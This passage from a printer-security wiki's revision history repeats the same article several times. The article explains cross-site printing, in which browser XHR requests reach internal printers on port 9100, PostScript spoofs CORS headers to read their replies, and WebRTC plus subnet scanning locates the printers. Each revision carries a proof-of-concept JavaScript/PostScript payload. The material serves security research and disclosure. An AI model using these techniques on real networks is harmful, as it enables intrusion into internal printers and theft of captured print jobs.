2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Channel !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || - || ✔ || ✔ || - |- | Web || ✔ || - || - || - |- | IPP || ✔ || - || ✔ || - |- | LPD || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- cb809fc1c7db99ede287e1b0c7baf10dd4304869 279 276 2017-01-28T16:47:54Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 268b9c72cabd2b36fbb5ea4bfe61f28660838a80 276 275 2017-01-28T16:46:26Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]] ---- 1856652a3e1d8eb31e11bf514179420fc42ed159 275 274 2017-01-28T16:45:44Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 568ad42ae457d4a5713a078df1eaf18fbfc60679 274 273 2017-01-28T16:45:32Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a 